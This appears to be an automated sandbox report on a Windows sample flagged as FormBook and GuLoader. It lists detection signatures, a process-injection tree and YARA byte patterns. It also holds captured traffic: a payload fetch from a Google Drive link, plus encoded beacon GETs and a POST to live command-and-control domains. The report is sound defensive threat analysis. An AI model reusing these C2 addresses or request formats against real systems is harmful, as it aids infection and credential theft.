Windows Analysis Report
hesaphareketi-01.exe

Overview

General Information

Sample name:hesaphareketi-01.exe
Analysis ID:1353023
MD5:e96bd1c59a8e67c4ab01a9327c98aab7
SHA1:184bfeb63316cb4aec59ee6038e1f0912541cbe9
SHA256:0b145928bcccd1f9510ef2744ef2487a38cdcdcc6b8595995c491c29f97f55e9
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • hesaphareketi-01.exe (PID: 9444 cmdline: C:\Users\user\Desktop\hesaphareketi-01.exe MD5: E96BD1C59A8E67C4AB01A9327C98AAB7)
    • hesaphareketi-01.exe (PID: 1380 cmdline: C:\Users\user\Desktop\hesaphareketi-01.exe MD5: E96BD1C59A8E67C4AB01A9327C98AAB7)
      • iyGEtqCQDnvMouCuszv.exe (PID: 3712 cmdline: "C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchProtocolHost.exe (PID: 8480 cmdline: C:\Windows\SysWOW64\SearchProtocolHost.exe MD5: 7C22FED393CA0330A10B47848018C225)
          • firefox.exe (PID: 9228 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x279f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13b9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x4d2cf:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x3947e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        AV Detection

        Source: http://www.dabblefurnishings.space/uaaq/Avira URL Cloud: Label: malware
        Source: http://www.foodpackaging-jobs07.xyz/uaaq/Avira URL Cloud: Label: malware
        Source: http://www.infinite-7.com/uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw==Avira URL Cloud: Label: malware
        Source: http://www.foodpackaging-jobs07.xyz/uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907Avira URL Cloud: Label: malware
        Source: http://www.infinite-7.com/uaaq/Avira URL Cloud: Label: malware
        Source: www.dabblefurnishings.space, Virustotal: Detection: 7%
        Source: hesaphareketi-01.exe, Virustotal: Detection: 18%
        Source: Yara matchFile source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: hesaphareketi-01.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.11.30:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.40.129:443 -> 192.168.11.30:49748 version: TLS 1.2
        Source: hesaphareketi-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdb source: SearchProtocolHost.exe
        Source: Binary string: SearchProtocolHost.pdbUGP source: iyGEtqCQDnvMouCuszv.exe, 0000000C.00000003.1297585062.0000000000F0D000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: SearchProtocolHost.pdb source: iyGEtqCQDnvMouCuszv.exe, 0000000C.00000003.1297585062.0000000000F0D000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DAC020 FindFirstFileW,FindNextFileW,FindClose,19_2_02DAC020
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FD50FF
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FCA32F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then mov esp, ebp12_2_00FC946F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FD708F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FD708E
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then xor eax, eax12_2_00FCF26F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then mov esp, ebp12_2_00FC9468
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then mov esp, ebp12_2_00FC9548
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FC9F5F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then pop edi19_2_02DA17B0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then xor eax, eax19_2_02D99990

        Networking

        Source: DNS query: www.foodpackaging-jobs07.xyz
        Source: DNS query: www.spark-tech-global.xyz
        Source: DNS query: www.tunug.xyz
        Source: Joe Sandbox ViewIP Address: 37.97.254.27 37.97.254.27
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FCA32F getaddrinfo,setsockopt,recv,recv,12_2_00FCA32F
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZIshcel7UMzwz8rXT4KX5lfic62QjZtZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/afsc4ag5uqa5maj4frjtgk9skbeu3peo/1701687750000/14166578405435855174/*/1ZIshcel7UMzwz8rXT4KX5lfic62QjZtZ?e=download&uuid=e13d7ba5-3bd0-48f6-b701-0767cd5a3c67 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0g-ag-docs.googleusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA== HTTP/1.1Host: www.90dayleaderlab.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907 HTTP/1.1Host: www.foodpackaging-jobs07.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA== HTTP/1.1Host: www.rocsys.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=+fLke0FkZ8ddpf91rSuK7zl5QINwJbdABoU0VkbbyogRs1jBfiuiWgTdT60Kd54wcvqO12MKWygzxtqc9m8Iy6fCV4+OuKKc/Q==&XFs82=6R5Xx6907 HTTP/1.1Host: www.tubidy.techAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw== HTTP/1.1Host: www.infinite-7.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=77nPASVBGS1VUo/R/j6d44mDwP+QIahx3JuWX6aukgDTtShzh3giMrfi3qntC2nVHjeoyaY8HDsr1L/VBT/etq3vOO5xT7Atwg==&XFs82=6R5Xx6907 HTTP/1.1Host: www.resolution-pj.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=FvUhDsBmpCJoj3lGkDh7rJRDQZ/xWYuOs9BV8EopI6SMYb/NSZXNOV1HCqXbeEBh5mla6CDOuwUwzd7BjgPBM1LiYO3UkBsWTw== HTTP/1.1Host: www.atlasmisc.orgAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907 HTTP/1.1Host: www.mariannaserocka.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=uqX2CpJoJvwTFA+ZFtoTb/Viquue5JaT7gdpcN3qNHbjP1Cd4gItxtd6vZy9N0V5BOWbrcI9A+ppibdEzCLbbhznzUeV+CWA9w== HTTP/1.1Host: www.spark-tech-global.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=EGijkzvOzpvUykTSqEH5xYloxulInJA6Yfy3UgRPmiIu9LDG8q5Bov6ZnoBY4U7UUr/swV4XyGGNsY5GmvOqPiqhu9t92ITdQQ==&XFs82=6R5Xx6907 HTTP/1.1Host: www.ayotundewrites.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=mPcoyCc3cvVI56HjA/xjRVjOd7rNkjWE/WSPp3YblL8zBWhOEeaQXn4Q6MGv1focxns6TnusPsnXCCahRqcYb38qMNH6MpLfYA== HTTP/1.1Host: www.viough.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx6907 HTTP/1.1Host: www.luciengeorge.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=c+6TcgwS74LYb/BtPGzNqx0v24f4gkgpuEv8j4KmZe3KWMq5Vv4U79mpWhSZrgbcOhaTjzTbW4/9rezZQ6Dag7ZY/b6dvvuFMQ==&XFs82=6R5Xx6907 HTTP/1.1Host: www.tunug.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZOLuwQ4GbhudklNTaAF4CqvaFcPUnb+ksfYc3Sr7bbbYZkY3qV8I6hFKN8xphgAEys4W8UAai/ACKckVxru298r+LRMvoVTRoA== HTTP/1.1Host: www.dabblefurnishings.spaceAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=uIq56BIwEgOtiyQr6743FVEUWeewfIvBTD+QAd7G5aNLRXmwRIDTY8coJ7Y84KRozcEAIYfXjUIHNLCJhW9aa5jrQ6gGBb360w==&XFs82=6R5Xx6907 HTTP/1.1Host: www.projectmerdeka.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /uaaq/ HTTP/1.1Host: www.foodpackaging-jobs07.xyzAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.foodpackaging-jobs07.xyzReferer: http://www.foodpackaging-jobs07.xyz/uaaq/Cache-Control: no-cacheConnection: closeContent-Length: 186Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 Data Ascii: 9pG0L=Tff68lvQbh9/pnMCZs7/qY9rcacYV6u9wekz5ZoknllQw4oXJ7f7vPYI/rUt7fQ3YlDDNjFTsjduzR87Qcrl0NgI5owALZpGm7wLVdCf7Ai0Sa5cgBXSQG0RW42OQHsp5gUc1XCDcr7H9BBI6C7aj59lMXFF4CL4KhGcJ09HXMwZEE672Q==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:04:48 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:08:13 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:04:50 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:08:13 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:04:53 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:08:13 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:04:56 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:08:13 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:16 GMTServer: Apache/2X-Powered-By: PHP/8.1.25Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 11321Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:18 GMTServer: Apache/2X-Powered-By: PHP/8.1.25Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 11321Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:21 GMTServer: Apache/2X-Powered-By: PHP/8.1.25Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 11321Content-Type: text/html; charset=UTF-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:05:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:05:33 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:05:35 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:05:38 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:05:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:05:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:05:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:05:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Accept-Ranges: bytes
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:08:09 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 282 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:08:12 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 282 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:08:15 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 282 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:08:18 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 282 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:08:05 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:08:07 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 11:08:10 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:08:13 GMT | Content-Type: text/html | Content-Length: 867 | Connection: close | Server: Apache/2 | Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT | Accept-Ranges: bytes | Age: 0
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Mon, 04 Dec 2023 11:08:18 GMT | server: LiteSpeed
